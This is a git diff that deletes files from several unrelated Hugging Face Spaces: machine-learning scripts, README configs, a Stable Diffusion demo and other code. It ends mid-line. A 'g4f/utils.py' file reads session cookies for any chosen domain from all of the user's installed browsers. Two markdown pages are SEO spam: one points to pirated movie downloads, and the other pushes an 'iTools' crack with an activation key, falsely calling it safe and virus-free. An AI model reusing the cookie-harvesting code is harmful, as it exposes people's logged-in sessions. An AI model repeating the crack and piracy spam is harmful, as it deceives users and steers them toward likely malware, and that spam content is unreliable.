.at({stroke: 'none', fill: 'rgba(255,255,255,.6)'}) - .translate(.5, 1) - - var includedPath = svg.append('path') - .at({stroke: '#000', fill: 'none'}) - .translate(.5, 1) - - - circleSel.at({fill: d => d.isSick ? colors.sick : colors.well}) - - datum.update = () => { - // rectSel.at({ - // // fill: d => rColors[d.grade > d.threshold][opacity(d)], - // // strokeWidth: d => opacity(d) ? 1 : .1, - // }) - - // circleSel.at({fill: d => cColors[d.isSick][opacity(d)]}) - - var byType = d3.nestBy(topology.objects.boxes.geometries, d => opacity(d.properties.d)) - - byType.forEach(type => { - var obj = {type: 'GeometryCollection', geometries: type} - var pathStr = path(topojson.mesh(topology, obj, (a, b) => a == b)) - - var pathSel = type.key == 'true' ? includedPath : hiddenPath - pathSel.at({d: pathStr}) - }) - - var sickBoxes = topology.objects.boxes.geometries - .filter(d => d.properties.d.grade <= d.properties.d.threshold) - var obj = {type: 'GeometryCollection', geometries: sickBoxes} - var pathStr = path(topojson.mesh(topology, obj, (a, b) => a == b)) - callWellPath.at({d: pathStr}) - } - } - - } - - - - function updateAll(){ - miniSel.each(d => d.update()) - } - - return {updateAll} -} - - - - - - - - - -if (window.init) window.init() diff --git a/spaces/mfrashad/CharacterGAN/models/stylegan2/stylegan2-pytorch/ppl.py b/spaces/mfrashad/CharacterGAN/models/stylegan2/stylegan2-pytorch/ppl.py deleted file mode 100644 index 6b185c894ba719701baa6ac348e743a003ec5f27..0000000000000000000000000000000000000000 --- a/spaces/mfrashad/CharacterGAN/models/stylegan2/stylegan2-pytorch/ppl.py +++ /dev/null @@ -1,104 +0,0 @@ -import argparse - -import torch -from torch.nn import functional as F -import numpy as np -from tqdm import tqdm - -import lpips -from model import Generator - - -def normalize(x): - return x / torch.sqrt(x.pow(2).sum(-1, keepdim=True)) - - -def slerp(a, b, t): - a = normalize(a) - b = normalize(b) - d = (a * b).sum(-1, keepdim=True) - p = t * torch.acos(d) - c = normalize(b - d * a) - d = a * torch.cos(p) + c * torch.sin(p) - - return normalize(d) - - -def lerp(a, b, t): - return a + (b - a) * t - - -if __name__ == '__main__': - device = 'cuda' - - parser = argparse.ArgumentParser() - - parser.add_argument('--space', choices=['z', 'w']) - parser.add_argument('--batch', type=int, default=64) - parser.add_argument('--n_sample', type=int, default=5000) - parser.add_argument('--size', type=int, default=256) - parser.add_argument('--eps', type=float, default=1e-4) - parser.add_argument('--crop', action='store_true') - parser.add_argument('ckpt', metavar='CHECKPOINT') - - args = parser.parse_args() - - latent_dim = 512 - - ckpt = torch.load(args.ckpt) - - g = Generator(args.size, latent_dim, 8).to(device) - g.load_state_dict(ckpt['g_ema']) - g.eval() - - percept = lpips.PerceptualLoss( - model='net-lin', net='vgg', use_gpu=device.startswith('cuda') - ) - - distances = [] - - n_batch = args.n_sample // args.batch - resid = args.n_sample - (n_batch * args.batch) - batch_sizes = [args.batch] * n_batch + [resid] - - with torch.no_grad(): - for batch in tqdm(batch_sizes): - noise = g.make_noise() - - inputs = torch.randn([batch * 2, latent_dim], device=device) - lerp_t = torch.rand(batch, device=device) - - if args.space == 'w': - latent = g.get_latent(inputs) - latent_t0, latent_t1 = latent[::2], latent[1::2] - latent_e0 = lerp(latent_t0, latent_t1, lerp_t[:, None]) - latent_e1 = lerp(latent_t0, latent_t1, lerp_t[:, None] + args.eps) - latent_e = torch.stack([latent_e0, latent_e1], 1).view(*latent.shape) - - image, _ = g([latent_e], input_is_latent=True, noise=noise) - - if args.crop: - c = image.shape[2] // 8 - image = image[:, :, c * 3 : c * 7, c * 2 : c * 6] - - factor = image.shape[2] // 256 - - if factor > 1: - image = F.interpolate( - image, size=(256, 256), mode='bilinear', align_corners=False - ) - - dist = percept(image[::2], image[1::2]).view(image.shape[0] // 2) / ( - args.eps ** 2 - ) - distances.append(dist.to('cpu').numpy()) - - distances = np.concatenate(distances, 0) - - lo = np.percentile(distances, 1, interpolation='lower') - hi = np.percentile(distances, 99, interpolation='higher') - filtered_dist = np.extract( - np.logical_and(lo <= distances, distances <= hi), distances - ) - - print('ppl:', filtered_dist.mean()) diff --git a/spaces/mikaelbhai/GPTBhai_text_history/README.md b/spaces/mikaelbhai/GPTBhai_text_history/README.md deleted file mode 100644 index bbf9cf8705327b307c5a1afd22aeaecce044dc71..0000000000000000000000000000000000000000 --- a/spaces/mikaelbhai/GPTBhai_text_history/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: GPTBhai Text History -emoji: 📚 -colorFrom: pink -colorTo: gray -sdk: gradio -sdk_version: 3.23.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/mikeee/convbot/tests/__init__.py b/spaces/mikeee/convbot/tests/__init__.py deleted file mode 100644 index 14e8999c92f78a983043250c29724ca6df723da6..0000000000000000000000000000000000000000 --- a/spaces/mikeee/convbot/tests/__init__.py +++ /dev/null @@ -1 +0,0 @@ -"""Init.""" diff --git a/spaces/mingyuan/ReMoDiffuse/mogen/models/architectures/base_architecture.py b/spaces/mingyuan/ReMoDiffuse/mogen/models/architectures/base_architecture.py deleted file mode 100644 index a2e9e4cfa63ecdaf116f4dc7028a983ba004f466..0000000000000000000000000000000000000000 --- a/spaces/mingyuan/ReMoDiffuse/mogen/models/architectures/base_architecture.py +++ /dev/null @@ -1,135 +0,0 @@ -from abc import ABCMeta, abstractmethod -from collections import OrderedDict - -import torch -import torch.distributed as dist -from mmcv.runner import BaseModule - - -def to_cpu(x): - if isinstance(x, torch.Tensor): - return x.detach().cpu() - return x - - -class BaseArchitecture(BaseModule): - """Base class for mogen architecture.""" - - def __init__(self, init_cfg=None): - super(BaseArchitecture, self).__init__(init_cfg) - - def forward_train(self, **kwargs): - pass - - def forward_test(self, **kwargs): - pass - - def _parse_losses(self, losses): - """Parse the raw outputs (losses) of the network. - Args: - losses (dict): Raw output of the network, which usually contain - losses and other necessary information. - Returns: - tuple[Tensor, dict]: (loss, log_vars), loss is the loss tensor \ - which may be a weighted sum of all losses, log_vars contains \ - all the variables to be sent to the logger. - """ - log_vars = OrderedDict() - for loss_name, loss_value in losses.items(): - if isinstance(loss_value, torch.Tensor): - log_vars[loss_name] = loss_value.mean() - elif isinstance(loss_value, list): - log_vars[loss_name] = sum(_loss.mean() for _loss in loss_value) - else: - raise TypeError( - f'{loss_name} is not a tensor or list of tensors') - - loss = sum(_value for _key, _value in log_vars.items() - if 'loss' in _key) - - log_vars['loss'] = loss - for loss_name, loss_value in log_vars.items(): - # reduce loss when distributed training - if dist.is_available() and dist.is_initialized(): - loss_value = loss_value.data.clone() - dist.all_reduce(loss_value.div_(dist.get_world_size())) - log_vars[loss_name] = loss_value.item() - - return loss, log_vars - - def train_step(self, data, optimizer): - """The iteration step during training. - This method defines an iteration step during training, except for the - back propagation and optimizer updating, which are done in an optimizer - hook. Note that in some complicated cases or models, the whole process - including back propagation and optimizer updating is also defined in - this method, such as GAN. - Args: - data (dict): The output of dataloader. - optimizer (:obj:`torch.optim.Optimizer` | dict): The optimizer of - runner is passed to ``train_step()``. This argument is unused - and reserved. - Returns: - dict: It should contain at least 3 keys: ``loss``, ``log_vars``, \ - ``num_samples``. - - ``loss`` is a tensor for back propagation, which can be a - weighted sum of multiple losses. - - ``log_vars`` contains all the variables to be sent to the - logger. - - ``num_samples`` indicates the batch size (when the model is - DDP, it means the batch size on each GPU), which is used for - averaging the logs. - """ - losses = self(**data) - loss, log_vars = self._parse_losses(losses) - - outputs = dict( - loss=loss, log_vars=log_vars, num_samples=len(data['motion'])) - - return outputs - - def val_step(self, data, optimizer=None): - """The iteration step during validation. - This method shares the same signature as :func:`train_step`, but used - during val epochs. Note that the evaluation after training epochs is - not implemented with this method, but an evaluation hook. - """ - losses = self(**data) - loss, log_vars = self._parse_losses(losses) - - outputs = dict( - loss=loss, log_vars=log_vars, num_samples=len(data['motion'])) - - return outputs - - def forward(self, **kwargs): - if self.training: - return self.forward_train(**kwargs) - else: - return self.forward_test(**kwargs) - - def split_results(self, results): - B = results['motion'].shape[0] - output = [] - for i in range(B): - batch_output = dict() - batch_output['motion'] = to_cpu(results['motion'][i]) - batch_output['pred_motion'] = to_cpu(results['pred_motion'][i]) - batch_output['motion_length'] = to_cpu(results['motion_length'][i]) - batch_output['motion_mask'] = to_cpu(results['motion_mask'][i]) - if 'pred_motion_length' in results.keys(): - batch_output['pred_motion_length'] = to_cpu(results['pred_motion_length'][i]) - else: - batch_output['pred_motion_length'] = to_cpu(results['motion_length'][i]) - if 'pred_motion_mask' in results: - batch_output['pred_motion_mask'] = to_cpu(results['pred_motion_mask'][i]) - else: - batch_output['pred_motion_mask'] = to_cpu(results['motion_mask'][i]) - if 'motion_metas' in results.keys(): - motion_metas = results['motion_metas'][i] - if 'text' in motion_metas.keys(): - batch_output['text'] = motion_metas['text'] - if 'token' in motion_metas.keys(): - batch_output['token'] = motion_metas['token'] - output.append(batch_output) - return output diff --git a/spaces/miruchigawa/hakurei-waifu-diffusion/README.md b/spaces/miruchigawa/hakurei-waifu-diffusion/README.md deleted file mode 100644 index e95b5c21dcfafad95141e11a03d871ed96fc378b..0000000000000000000000000000000000000000 --- a/spaces/miruchigawa/hakurei-waifu-diffusion/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Hakurei Waifu Diffusion -emoji: 🦀 -colorFrom: indigo -colorTo: gray -sdk: gradio -sdk_version: 3.16.2 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/monra/freegpt-webui-chimera/g4f/utils.py b/spaces/monra/freegpt-webui-chimera/g4f/utils.py deleted file mode 100644 index d5ab41c79b44ab81e1843d209cb342bd83dafb42..0000000000000000000000000000000000000000 --- a/spaces/monra/freegpt-webui-chimera/g4f/utils.py +++ /dev/null @@ -1,49 +0,0 @@ -import browser_cookie3 - - -class Utils: - browsers = [ - browser_cookie3.chrome, # 62.74% market share - browser_cookie3.safari, # 24.12% market share - browser_cookie3.firefox, # 4.56% market share - browser_cookie3.edge, # 2.85% market share - browser_cookie3.opera, # 1.69% market share - browser_cookie3.brave, # 0.96% market share - browser_cookie3.opera_gx, # 0.64% market share - browser_cookie3.vivaldi, # 0.32% market share - ] - - def get_cookies(domain: str, setName: str = None, setBrowser: str = False) -> dict: - cookies = {} - - if setBrowser != False: - for browser in Utils.browsers: - if browser.__name__ == setBrowser: - try: - for c in browser(domain_name=domain): - if c.name not in cookies: - cookies = cookies | {c.name: c.value} - - except Exception as e: - pass - - else: - for browser in Utils.browsers: - try: - for c in browser(domain_name=domain): - if c.name not in cookies: - cookies = cookies | {c.name: c.value} - - except Exception as e: - pass - - if setName: - try: - return {setName: cookies[setName]} - - except ValueError: - print(f'Error: could not find {setName} cookie in any browser.') - exit(1) - - else: - return cookies diff --git a/spaces/mrstuffandthings/Bark-Voice-Cloning/README.md b/spaces/mrstuffandthings/Bark-Voice-Cloning/README.md deleted file mode 100644 index 5546ba5a357cbeed205ad99d6c4a41201b4a15d5..0000000000000000000000000000000000000000 --- a/spaces/mrstuffandthings/Bark-Voice-Cloning/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: Bark Voice Cloning -emoji: 🎶 -colorFrom: yellow -colorTo: pink -sdk: gradio -sdk_version: 3.34.0 -app_file: app.py -pinned: false -license: mit -duplicated_from: kevinwang676/Bark-Voice-Cloning ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/mshukor/UnIVAL/fairseq/examples/wav2vec/unsupervised/scripts/prepare_audio.sh b/spaces/mshukor/UnIVAL/fairseq/examples/wav2vec/unsupervised/scripts/prepare_audio.sh deleted file mode 100644 index 013f7a9b055a7693a29f9c5ba1e4003a9a25850e..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/examples/wav2vec/unsupervised/scripts/prepare_audio.sh +++ /dev/null @@ -1,78 +0,0 @@ -#!/usr/bin/env zsh -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -source_dir=$1 -tgt_dir=$2 -model=$3 - -if [ -z "$4" ] - then - dim=512 - else - dim=$4 -fi - -echo "using $dim dim for PCA" - -if [ -z "$5" ] - then - layer=14 - else - layer=$5 -fi - -echo "extracting from layer $layer" - -train_split=train -valid_split=valid -test_split=test - -all_splits=($train_split) - -if [[ -f "$source_dir/valid.tsv" ]]; then - all_splits+=('valid') -fi - -if [[ -f "$source_dir/test.tsv" ]]; then - all_splits+=('test') -fi - -echo "processing splits: $all_splits" - -mkdir -p $tgt_dir - -cp $source_dir/*.tsv $tgt_dir -cp $source_dir/*.wrd $tgt_dir -cp $source_dir/*.ltr $tgt_dir -cp $source_dir/*.phn $tgt_dir -cp $source_dir/dict* $tgt_dir - -setopt shwordsplit - -for split in $all_splits; do - python $FAIRSEQ_ROOT/examples/wav2vec/unsupervised/scripts/wav2vec_extract_features.py $source_dir --split $split \ - --save-dir $tgt_dir --checkpoint $model --layer $layer -done - -python $FAIRSEQ_ROOT/examples/wav2vec/unsupervised/scripts/wav2vec_cluster_faiss.py $tgt_dir/${train_split}.tsv \ ---checkpoint $model --save-dir $tgt_dir -f "CLUS128" --sample-pct 1.0 - -for split in $all_splits; do - python $FAIRSEQ_ROOT/examples/wav2vec/unsupervised/scripts/wav2vec_apply_cluster_faiss.py $tgt_dir \ - --checkpoint $model --path $tgt_dir/CLUS128 --split $split -done - -python $FAIRSEQ_ROOT/examples/wav2vec/unsupervised/scripts/pca.py $tgt_dir/${train_split}.npy --output $tgt_dir/pca --dim $dim - -for split in $all_splits; do - python $FAIRSEQ_ROOT/examples/wav2vec/unsupervised/scripts/apply_pca.py $tgt_dir --split $split --save-dir $tgt_dir/precompute_pca$dim --pca-path $tgt_dir/pca/${dim}_pca --batch-size 1048000 - - python $FAIRSEQ_ROOT/examples/wav2vec/unsupervised/scripts/merge_clusters.py $tgt_dir/precompute_pca$dim --cluster-dir $tgt_dir/CLUS128 \ - --split $split --save-dir $tgt_dir/precompute_pca${dim}_cls128_mean --pooling mean - - python $FAIRSEQ_ROOT/examples/wav2vec/unsupervised/scripts/mean_pool.py $tgt_dir/precompute_pca${dim}_cls128_mean \ - --save-dir $tgt_dir/precompute_pca${dim}_cls128_mean_pooled --split $split -done diff --git a/spaces/mshukor/UnIVAL/fairseq/fairseq/data/token_block_dataset.py b/spaces/mshukor/UnIVAL/fairseq/fairseq/data/token_block_dataset.py deleted file mode 100644 index d2c65fd7e058072911c3aa60bfc760288a0f83e5..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/fairseq/data/token_block_dataset.py +++ /dev/null @@ -1,202 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import numpy as np -import torch -from fairseq.data import FairseqDataset, plasma_utils -from fairseq.data.indexed_dataset import best_fitting_int_dtype -from typing import Tuple - - -class TokenBlockDataset(FairseqDataset): - """Break a Dataset of tokens into blocks. - - Args: - dataset (~torch.utils.data.Dataset): dataset to break into blocks - sizes (List[int]): sentence lengths (required for 'complete' and 'eos') - block_size (int): maximum block size (ignored in 'eos' break mode) - break_mode (str, optional): Mode used for breaking tokens. Values can - be one of: - - 'none': break tokens into equally sized blocks (up to block_size) - - 'complete': break tokens into blocks (up to block_size) such that - blocks contains complete sentences, although block_size may be - exceeded if some sentences exceed block_size - - 'complete_doc': similar to 'complete' mode, but do not - cross document boundaries - - 'eos': each block contains one sentence (block_size is ignored) - include_targets (bool, optional): return next tokens as targets - (default: False). - document_sep_len (int, optional): document separator size (required for - 'complete_doc' break mode). Typically 1 if the sentences have eos - and 0 otherwise. - """ - - def __init__( - self, - dataset, - sizes, - block_size, - pad, - eos, - break_mode=None, - include_targets=False, - document_sep_len=1, - use_plasma_view=False, - split_path=None, - plasma_path=None, - ): - - super().__init__() - self.dataset = dataset - self.pad = pad - self.eos = eos - self.include_targets = include_targets - - assert len(dataset) > 0 - - assert len(dataset) == len(sizes) - _sizes, block_to_dataset_index, slice_indices = self._build_slice_indices( - sizes, break_mode, document_sep_len, block_size - ) - if use_plasma_view: - plasma_id = (block_size, document_sep_len, str(break_mode), len(dataset)) - self._slice_indices = plasma_utils.PlasmaView( - slice_indices, split_path, (plasma_id, 0), plasma_path=plasma_path - ) - self._sizes = plasma_utils.PlasmaView( - _sizes, split_path, (plasma_id, 1), plasma_path=plasma_path - ) - self._block_to_dataset_index = plasma_utils.PlasmaView( - block_to_dataset_index, split_path, (plasma_id, 2), plasma_path=plasma_path, - ) - else: - self._slice_indices = plasma_utils.PlasmaArray(slice_indices) - self._sizes = plasma_utils.PlasmaArray(_sizes) - self._block_to_dataset_index = plasma_utils.PlasmaArray( - block_to_dataset_index - ) - - @staticmethod - def _build_slice_indices( - sizes, break_mode, document_sep_len, block_size - ) -> Tuple[np.ndarray]: - """Use token_block_utils_fast to build arrays for indexing into self.dataset""" - try: - from fairseq.data.token_block_utils_fast import ( - _get_slice_indices_fast, - _get_block_to_dataset_index_fast, - ) - except ImportError: - raise ImportError( - "Please build Cython components with: `pip install --editable .` " - "or `python setup.py build_ext --inplace`" - ) - - if isinstance(sizes, list): - sizes = np.array(sizes, dtype=np.int64) - else: - if torch.is_tensor(sizes): - sizes = sizes.numpy() - sizes = sizes.astype(np.int64) - - break_mode = break_mode if break_mode is not None else "none" - - # For "eos" break-mode, block_size is not required parameters. - if break_mode == "eos" and block_size is None: - block_size = 0 - - slice_indices = _get_slice_indices_fast( - sizes, str(break_mode), block_size, document_sep_len - ) - _sizes = slice_indices[:, 1] - slice_indices[:, 0] - - # build index mapping block indices to the underlying dataset indices - if break_mode == "eos": - # much faster version for eos break mode - block_to_dataset_index = np.stack( - [ - np.arange(len(sizes)), # starting index in dataset - np.zeros( - len(sizes), dtype=np.compat.long - ), # starting offset within starting index - np.arange(len(sizes)), # ending index in dataset - ], - 1, - ) - else: - block_to_dataset_index = _get_block_to_dataset_index_fast( - sizes, slice_indices, - ) - size_dtype = np.uint16 if block_size < 65535 else np.uint32 - num_tokens = slice_indices[-1].max() - slice_indices_dtype = best_fitting_int_dtype(num_tokens) - slice_indices = slice_indices.astype(slice_indices_dtype) - _sizes = _sizes.astype(size_dtype) - block_to_dataset_index = block_to_dataset_index.astype(slice_indices_dtype) - return _sizes, block_to_dataset_index, slice_indices - - @property - def slice_indices(self): - return self._slice_indices.array - - @property - def sizes(self): - return self._sizes.array - - @property - def block_to_dataset_index(self): - return self._block_to_dataset_index.array - - def attr(self, attr: str, index: int): - start_ds_idx, _, _ = self.block_to_dataset_index[index] - return self.dataset.attr(attr, start_ds_idx) - - def __getitem__(self, index): - start_ds_idx, start_offset, end_ds_idx = self.block_to_dataset_index[index] - - buffer = torch.cat( - [self.dataset[idx] for idx in range(start_ds_idx, end_ds_idx + 1)] - ) - slice_s, slice_e = self.slice_indices[index] - length = slice_e - slice_s - s, e = start_offset, start_offset + length - item = buffer[s:e] - - if self.include_targets: - # *target* is the original sentence (=item) - # *source* is shifted right by 1 (maybe left-padded with eos) - # *past_target* is shifted right by 2 (left-padded as needed) - if s == 0: - source = torch.cat([item.new([self.eos]), buffer[0 : e - 1]]) - past_target = torch.cat( - [item.new([self.pad, self.eos]), buffer[0 : e - 2]] - ) - else: - source = buffer[s - 1 : e - 1] - if s == 1: - past_target = torch.cat([item.new([self.eos]), buffer[0 : e - 2]]) - else: - past_target = buffer[s - 2 : e - 2] - - return source, item, past_target - - return item - - def __len__(self): - return len(self.slice_indices) - - @property - def supports_prefetch(self): - return getattr(self.dataset, "supports_prefetch", False) - - def prefetch(self, indices): - self.dataset.prefetch( - { - ds_idx - for index in indices - for start_ds_idx, _, end_ds_idx in [self.block_to_dataset_index[index]] - for ds_idx in range(start_ds_idx, end_ds_idx + 1) - } - ) diff --git a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/C.D. Kand Movie Download Hd 720p !!BETTER!!.md b/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/C.D. Kand Movie Download Hd 720p !!BETTER!!.md deleted file mode 100644 index 819bc454026aa65d99fe12c8824631124de12595..0000000000000000000000000000000000000000 --- a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/C.D. Kand Movie Download Hd 720p !!BETTER!!.md +++ /dev/null @@ -1,17 +0,0 @@ - -

          C.D. Kand: A Bollywood Horror Movie You Can Watch Online

          -

          C.D. Kand is a 2014 Hindi horror movie directed by Imtiaz Patel and starring Anuya Bhagvath, Anara Gupta, Samarth Chaturvedi and others. The movie tells the story of a woman named Gauri Devi, who is sexually exploited and killed by politicians, and comes back as a ghost to take revenge with the help of a reporter named Mansi Rana.

          -

          If you are looking for a way to watch C.D. Kand online, you can find some websites that offer the movie in HD 720p quality. However, be careful of the legal and ethical issues involved in downloading or streaming pirated content. You may also face malware or virus threats from some of these websites.

          -

          C.D. Kand Movie Download Hd 720p


          Download ✒ ✒ ✒ https://urlcod.com/2uIc4s



          -

          One of the websites that claims to have C.D. Kand movie download HD 720p is HDHub4u[^4^], which also offers other Bollywood and Hollywood movies and web series in Hindi and English. Another website that claims to have the movie is Peatix[^5^], which also provides a link to download it. You can also find some links to the movie on SoundCloud[^6^] [^7^], where some users have uploaded it.

          -

          However, we do not recommend or endorse any of these websites, as they may violate the copyright laws and harm the original creators of the movie. We suggest you watch C.D. Kand legally on YouTube[^2^], where it is available for free by Shemaroo Movies, a reputed entertainment company.

          -

          C.D. Kand is a movie that may appeal to fans of horror and drama genres, as it has some elements of suspense, mystery and social commentary. The movie has received mixed reviews from critics and audiences, with some praising its bold theme and performances, and others criticizing its low production value and poor direction.

          -

          If you are interested in watching C.D. Kand online, you can check out the official trailer on YouTube[^2^] and decide for yourself if it is worth your time. You can also read some reviews of the movie on Rotten Tomatoes[^1^] and Times of India[^3^] to get more insights into its plot and quality.

          - -

          C.D. Kand: The Cast and Crew of the Movie

          -

          C.D. Kand is a movie that features a mix of new and experienced actors and actresses. The lead roles of Gauri Devi and Mansi Rana are played by Anuya Bhagvath and Anara Gupta respectively. Anuya Bhagvath is a Tamil actress who has appeared in movies like Siva Manasula Sakthi and Nanban. Anara Gupta is a former Miss Jammu who has acted in movies like Miss Anara and Memsahab.

          -

          The other actors who have important roles in C.D. Kand are Samarth Chaturvedi, Jay Kapdia, Dhananjay Singh and Sunny Charles. Samarth Chaturvedi plays the role of a politician named Rajesh Singh, who is one of the main antagonists of the movie. Jay Kapdia plays the role of a journalist named Ravi Sharma, who helps Mansi Rana in her investigation. Dhananjay Singh plays the role of another politician named Pratap Singh, who is also involved in the scandal. Sunny Charles plays the role of Pushkar, a friend of Ravi Sharma.

          -

          The movie is directed by Imtiaz Patel, who has also written the story and produced the movie along with Ajay G Shah. Imtiaz Patel is a filmmaker who has made movies like Aaj Ka Naya Khiladi and Aaj Ka Fashion Trend. The music of the movie is composed by Iqbal Darbar, who has given music for movies like Hum Dil De Chuke Sanam and Tere Naam. The cinematography of the movie is done by Naren Gedia, who has worked on movies like Aashiqui 2 and Murder 3. The editing of the movie is done by Imtiaz Alam, who has edited movies like Jism 2 and Ragini MMS 2.

          -

          e93f5a0c3f
          -
          -
          \ No newline at end of file diff --git a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/ITools 4.4.3.6 Crack Free Activation Key Download 2019 TOP.md b/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/ITools 4.4.3.6 Crack Free Activation Key Download 2019 TOP.md deleted file mode 100644 index 68566859200acf8add20aead69388f854f8a2f89..0000000000000000000000000000000000000000 --- a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/ITools 4.4.3.6 Crack Free Activation Key Download 2019 TOP.md +++ /dev/null @@ -1,50 +0,0 @@ - -

          iTools 4.4.3.6 Crack: A Free and Easy Way to Manage Your iOS Devices

          - -

          If you are looking for a simple and effective way to transfer and manage your files, apps, music, photos, and videos between your iOS devices and your PC or Mac, you might want to try iTools 4.4.3.6 Crack. This is a free utility that lets you access and control your iPhone, iPad, or iPod touch without using iTunes.

          -

          iTools 4.4.3.6 Crack Free Activation Key Download { 2019 }


          Download Zip ••• https://urlcod.com/2uI9GC



          - -

          iTools 4.4.3.6 Crack is compatible with all series of iOS devices and supports the latest iOS 16 version. It also works with Windows 11/10, Windows 8.1/8, Windows 7, Vista, XP, and Mac OS X. You can download it from the official website or from the link below.

          - -

          With iTools 4.4.3.6 Crack, you can enjoy many features that iTunes does not offer, such as:

          - -
            -
          • Transfer music in two ways without losing any tracks or playlists.
          • -
          • Export photos instantly from your device to your computer with one click.
          • -
          • Customize your ringtones with the built-in iTools Ringtone Maker.
          • -
          • Back up or restore data on your device with ease.
          • -
          • Simulate any location on your device with the Virtual Location feature.
          • -
          • Manage your apps, contacts, files, and more with a user-friendly interface.
          • -
          - -

          iTools 4.4.3.6 Crack is a safe and reliable tool that does not require jailbreak or installation. It does not contain any viruses or malware and does not affect your device's performance. You can use it without any risk or limitation.

          - -

          To get iTools 4.4.3.6 Crack for free, you need to follow these steps:

          - -
            -
          1. Download the iTools 4.4.3.6 Crack file from the link below.
          2. -
          3. Extract the file and run the iTools.exe file.
          4. -
          5. Connect your iOS device to your computer via USB cable.
          6. -
          7. Launch iTools and enter the activation key that you will find in the crack file.
          8. -
          9. Enjoy using iTools 4.4.3.6 Crack for free!
          10. -
          - -

          iTools 4.4.3.6 Crack is a must-have tool for iOS users who want to manage their devices easily and efficiently. It is a better alternative to iTunes that gives you more freedom and flexibility. Download it now and see for yourself!

          - -

          Download iTools 4.4.3.6 Crack Free Activation Key Here

          - -

          What are the benefits of using iTools 4.4.3.6 Crack?

          - -

          iTools 4.4.3.6 Crack is a powerful and versatile tool that can help you manage your iOS devices in many ways. Here are some of the benefits of using this tool:

          -

          - -
            -
          • It saves you time and space. You don't need to install iTunes or any other software on your computer to use iTools. It also consumes less disk space and memory than iTunes.
          • -
          • It gives you more control and options. You can transfer and manage your files, apps, music, photos, and videos with more flexibility and convenience than iTunes. You can also customize your ringtones, simulate your location, backup or restore your data, and more with iTools.
          • -
          • It protects your privacy and security. You don't need to log in to iTunes or Apple ID to use iTools. It also does not collect or share any of your personal information or data. You can use it with confidence and peace of mind.
          • -
          • It supports multiple languages and devices. You can use iTools in English, Chinese, Japanese, Korean, French, German, Spanish, and more languages. It also supports all series of iPhone, iPad, iPod touch, and iOS versions.
          • -
          - -

          iTools 4.4.3.6 Crack is a smart and handy tool that can make your life easier and better. It is a one-stop solution for all your iOS device management needs. Try it today and see the difference!

          cec2833e83
          -
          -
          \ No newline at end of file diff --git a/spaces/nightfury/Stable_Diffusion/app.py b/spaces/nightfury/Stable_Diffusion/app.py deleted file mode 100644 index f262db49947bdbcf8de2f6e5276f504172008139..0000000000000000000000000000000000000000 --- a/spaces/nightfury/Stable_Diffusion/app.py +++ /dev/null @@ -1,57 +0,0 @@ -import gradio as gr -#import torch -#from torch import autocast // only for GPU - -from PIL import Image -import numpy as np -from io import BytesIO -import os -MY_SECRET_TOKEN=os.environ.get('HF_TOKEN_SD') - -from diffusers import StableDiffusionImg2ImgPipeline - -print("hello sylvain") - -YOUR_TOKEN=MY_SECRET_TOKEN - -device="cpu" - -#prompt_pipe = StableDiffusionPipeline.from_pretrained("CompVis/stable-diffusion-v1-4", use_auth_token=YOUR_TOKEN) -#prompt_pipe.to(device) - -img_pipe = StableDiffusionImg2ImgPipeline.from_pretrained("CompVis/stable-diffusion-v1-4", use_auth_token=YOUR_TOKEN) -img_pipe.to(device) - -source_img = gr.Image(source="upload", type="filepath", label="init_img | 512*512 px") -gallery = gr.Gallery(label="Generated images", show_label=False, elem_id="gallery").style(grid=[2], height="auto") - -def resize(value,img): - #baseheight = value - img = Image.open(img) - #hpercent = (baseheight/float(img.size[1])) - #wsize = int((float(img.size[0])*float(hpercent))) - #img = img.resize((wsize,baseheight), Image.Resampling.LANCZOS) - img = img.resize((value,value), Image.Resampling.LANCZOS) - return img - - -def infer(prompt, source_img): - - source_image = resize(512, source_img) - source_image.save('source.png') - images_list = img_pipe([prompt] * 2, init_image=source_image, strength=0.75) - images = [] - safe_image = Image.open(r"unsafe.png") - for i, image in enumerate(images_list["sample"]): - if(images_list["nsfw_content_detected"][i]): - images.append(safe_image) - else: - images.append(image) - return images - -print("Great sylvain ! Everything is working fine !") - -title="Img2Img Stable Diffusion CPU" -description="Img2Img Stable Diffusion example using CPU and HF token.
          Warning: Slow process... ~5/10 min inference time. NSFW filter enabled." - -gr.Interface(fn=infer, inputs=["text", source_img], outputs=gallery,title=title,description=description).queue(max_size=100).launch(enable_queue=True) \ No newline at end of file diff --git a/spaces/nikitaPDL2023/assignment4/detectron2/tests/data/test_sampler.py b/spaces/nikitaPDL2023/assignment4/detectron2/tests/data/test_sampler.py deleted file mode 100644 index 0d2784390801314862524e1b85703535d199e41d..0000000000000000000000000000000000000000 --- a/spaces/nikitaPDL2023/assignment4/detectron2/tests/data/test_sampler.py +++ /dev/null @@ -1,111 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import itertools -import math -import operator -import unittest -import torch -from torch.utils import data -from torch.utils.data.sampler import SequentialSampler - -from detectron2.data.build import worker_init_reset_seed -from detectron2.data.common import DatasetFromList, ToIterableDataset -from detectron2.data.samplers import ( - GroupedBatchSampler, - InferenceSampler, - RepeatFactorTrainingSampler, - TrainingSampler, -) -from detectron2.utils.env import seed_all_rng - - -class TestGroupedBatchSampler(unittest.TestCase): - def test_missing_group_id(self): - sampler = SequentialSampler(list(range(100))) - group_ids = [1] * 100 - samples = GroupedBatchSampler(sampler, group_ids, 2) - - for mini_batch in samples: - self.assertEqual(len(mini_batch), 2) - - def 